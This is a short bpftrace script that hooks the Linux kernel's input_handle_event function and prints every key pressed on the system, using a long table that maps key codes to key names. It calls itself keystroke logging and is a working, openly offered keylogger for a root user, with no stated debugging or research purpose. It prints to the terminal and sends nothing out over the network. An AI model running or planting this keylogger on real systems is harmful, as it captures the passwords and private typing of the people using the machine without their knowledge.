#!/usr/bin/env bpftrace

#include <linux/input.h>
#include <uapi/linux/input-event-codes.h>


BEGIN {
  printf("Logging Keystrokes at: ");
  time();
  @translations[0] = "RESERVED";
  @translations[1] = "ESC";
  @translations[2] = "1";
  @translations[3] = "2";
  @translations[4] = "3";
  @translations[5] = "4";
  @translations[6] = "5";
  @translations[7] = "6";
  @translations[8] = "7";
  @translations[9] = "8";
  @translations[10] = "9";
  @translations[11] = "0";
  @translations[12] = "MINUS";
  @translations[13] = "EQUAL";
  @translations[14] = "BACKSPACE";
  @translations[15] = "TAB";
  @translations[16] = "Q";
  @translations[17] = "W";
  @translations[18] = "E";
  @translations[19] = "R";
  @translations[20] = "T";
  @translations[21] = "Y";
  @translations[22] = "U";
  @translations[23] = "I";
  @translations[24] = "O";
  @translations[25] = "P";
  @translations[26] = "LEFTBRACE";
  @translations[27] = "RIGHTBRACE";
  @translations[28] = "ENTER";
  @translations[29] = "LEFTCTRL";
  @translations[30] = "A";
  @translations[31] = "S";
  @translations[32] = "D";
  @translations[33] = "F";
  @translations[34] = "G";
  @translations[35] = "H";
  @translations[36] = "J";
  @translations[37] = "K";
  @translations[38] = "L";
  @translations[39] = "SEMICOLON";
  @translations[40] = "APOSTROPHE";
  @translations[41] = "GRAVE";
  @translations[42] = "LEFTSHIFT";
  @translations[43] = "BACKSLASH";
  @translations[44] = "Z";
  @translations[45] = "X";
  @translations[46] = "C";
  @translations[47] = "V";
  @translations[48] = "B";
  @translations[49] = "N";
  @translations[50] = "M";
  @translations[51] = "COMMA";
  @translations[52] = "DOT";
  @translations[53] = "SLASH";
  @translations[54] = "RIGHTSHIFT";
  @translations[55] = "KPASTERISK";
  @translations[56] = "LEFTALT";
  @translations[57] = "SPACE";
  @translations[58] = "CAPSLOCK";
  @translations[59] = "F1";
  @translations[60] = "F2";
  @translations[61] = "F3";
  @translations[62] = "F4";
  @translations[63] = "F5";
  @translations[64] = "F6";
  @translations[65] = "F7";
  @translations[66] = "F8";
  @translations[67] = "F9";
  @translations[68] = "F10";
  @translations[69] = "NUMLOCK";
  @translations[70] = "SCROLLLOCK";
  @translations[71] = "KP7";
  @translations[72] = "KP8";
  @translations[73] = "KP9";
  @translations[74] = "KPMINUS";
  @translations[75] = "KP4";
  @translations[76] = "KP5";
  @translations[77] = "KP6";
  @translations[78] = "KPPLUS";
  @translations[79] = "KP1";
  @translations[80] = "KP2";
  @translations[81] = "KP3";
  @translations[82] = "KP0";
  @translations[83] = "KPDOT";
  @translations[84] = "ZENKAKUHANKAKU";
  @translations[85] = "102ND";
  @translations[86] = "F11";
  @translations[87] = "F12";
  @translations[88] = "RO";
  @translations[89] = "KATAKANA";
  @translations[90] = "HIRAGANA";
  @translations[91] = "HENKAN";
  @translations[92] = "KATAKANAHIRAGANA";
  @translations[93] = "MUHENKAN";
  @translations[94] = "KPJPCOMMA";
  @translations[95] = "KPENTER";
  @translations[96] = "RIGHTCTRL";
  @translations[97] = "KPSLASH";
  @translations[98] = "SYSRQ";
  @translations[99] = "RIGHTALT";
  @translations[100] = "LINEFEED";
  @translations[101] = "HOME";
  @translations[102] = "UP";
  @translations[103] = "PAGEUP";
  @translations[104] = "LEFT";
  @translations[105] = "RIGHT";
  @translations[106] = "END";
  @translations[107] = "DOWN";
  @translations[108] = "PAGEDOWN";
  @translations[109] = "INSERT";
  @translations[110] = "DELETE";
  @translations[111] = "MACRO";
  @translations[112] = "MUTE";
  @translations[113] = "VOLUMEDOWN";
  @translations[114] = "VOLUMEUP";
  @translations[115] = "POWER";
  @translations[116] = "KPEQUAL";
  @translations[117] = "KPPLUSMINUS";
  @translations[118] = "PAUSE";
  @translations[119] = "SCALE";
  @translations[120] = "KPCOMMA";
  @translations[121] = "HANGEUL";
  @translations[122] = "HANGUEL";
  @translations[123] = "HANJA";
  @translations[124] = "YEN";
  @translations[125] = "LEFTMETA";
  @translations[126] = "RIGHTMETA";
  @translations[127] = "COMPOSE";
  @translations[128] = "STOP";
  @translations[129] = "AGAIN";
  @translations[130] = "PROPS";
  @translations[131] = "UNDO";
  @translations[132] = "FRONT";
  @translations[133] = "COPY";
  @translations[134] = "OPEN";
  @translations[135] = "PASTE";
  @translations[136] = "FIND";
  @translations[137] = "CUT";
  @translations[138] = "HELP";
  @translations[139] = "MENU";
  @translations[140] = "CALC";
  @translations[141] = "SETUP";
  @translations[142] = "SLEEP";
  @translations[143] = "WAKEUP";
  @translations[144] = "FILE";
  @translations[145] = "SENDFILE";
  @translations[146] = "DELETEFILE";
  @translations[147] = "XFER";
  @translations[148] = "PROG1";
  @translations[149] = "PROG2";
  @translations[150] = "WWW";
  @translations[151] = "MSDOS";
  @translations[152] = "COFFEE";
  @translations[153] = "SCREENLOCK";
  @translations[154] = "ROTATE_DISPLAY";
  @translations[155] = "DIRECTION";
  @translations[156] = "CYCLEWINDOWS";
  @translations[157] = "MAIL";
  @translations[158] = "BOOKMARKS";
  @translations[159] = "COMPUTER";
  @translations[160] = "BACK";
  @translations[161] = "FORWARD";
  @translations[162] = "CLOSECD";
  @translations[163] = "EJECTCD";
  @translations[164] = "EJECTCLOSECD";
  @translations[165] = "NEXTSONG";
  @translations[166] = "PLAYPAUSE";
  @translations[167] = "PREVIOUSSONG";
  @translations[168] = "STOPCD";
  @translations[169] = "RECORD";
  @translations[170] = "REWIND";
  @translations[171] = "PHONE";
  @translations[172] = "ISO";
  @translations[173] = "CONFIG";
  @translations[174] = "HOMEPAGE";
  @translations[175] = "REFRESH";
  @translations[176] = "EXIT";
  @translations[177] = "MOVE";
  @translations[178] = "EDIT";
  @translations[179] = "SCROLLUP";
  @translations[180] = "SCROLLDOWN";
  @translations[181] = "KPLEFTPAREN";
  @translations[182] = "KPRIGHTPAREN";
  @translations[183] = "NEW";
  @translations[184] = "REDO";
  @translations[185] = "F13";
  @translations[186] = "F14";
  @translations[187] = "F15";
  @translations[188] = "F16";
  @translations[189] = "F17";
  @translations[190] = "F18";
  @translations[191] = "F19";
  @translations[192] = "F20";
  @translations[193] = "F21";
  @translations[194] = "F22";
  @translations[195] = "F23";
  @translations[196] = "F24";
  @translations[197] = "PLAYCD";
  @translations[198] = "PAUSECD";
  @translations[199] = "PROG3";
  @translations[200] = "PROG4";
  @translations[201] = "ALL_APPLICATIONS";
  @translations[202] = "DASHBOARD";
  @translations[203] = "SUSPEND";
  @translations[204] = "CLOSE";
  @translations[205] = "PLAY";
  @translations[206] = "FASTFORWARD";
  @translations[207] = "BASSBOOST";
  @translations[208] = "PRINT";
  @translations[209] = "HP";
  @translations[210] = "CAMERA";
  @translations[211] = "SOUND";
  @translations[212] = "QUESTION";
  @translations[213] = "EMAIL";
  @translations[214] = "CHAT";
  @translations[215] = "SEARCH";
  @translations[216] = "CONNECT";
  @translations[217] = "FINANCE";
  @translations[218] = "SPORT";
  @translations[219] = "SHOP";
  @translations[220] = "ALTERASE";
  @translations[221] = "CANCEL";
  @translations[222] = "BRIGHTNESSDOWN";
  @translations[223] = "BRIGHTNESSUP";
  @translations[224] = "MEDIA";
  @translations[225] = "SWITCHVIDEOMODE";
  @translations[226] = "KBDILLUMTOGGLE";
  @translations[227] = "KBDILLUMDOWN";
  @translations[228] = "KBDILLUMUP";
  @translations[229] = "SEND";
  @translations[230] = "REPLY";
  @translations[231] = "FORWARDMAIL";
  @translations[232] = "SAVE";
  @translations[233] = "DOCUMENTS";
  @translations[234] = "BATTERY";
  @translations[235] = "BLUETOOTH";
  @translations[236] = "WLAN";
  @translations[237] = "UWB";
  @translations[238] = "UNKNOWN";
  @translations[239] = "VIDEO_NEXT";
  @translations[240] = "VIDEO_PREV";
  @translations[241] = "BRIGHTNESS_CYCLE";
  @translations[242] = "BRIGHTNESS_AUTO";
  @translations[243] = "BRIGHTNESS_ZERO";
  @translations[244] = "DISPLAY_OFF";
  @translations[245] = "WWAN";
  @translations[246] = "WIMAX";
  @translations[247] = "RFKILL";
  @translations[248] = "MICMUTE"
}

kprobe:input_handle_event
/ arg1 == EV_KEY && arg2 < 0x100 && arg3 == 1 /
{
  // void input_handle_event(struct input_dev *dev,
	//                         unsigned int type, unsigned int code, int value

  printf("%s\n", @translations[arg2]);
}

END
{
  printf("Logging Keystrokes at: ");
  time();
}
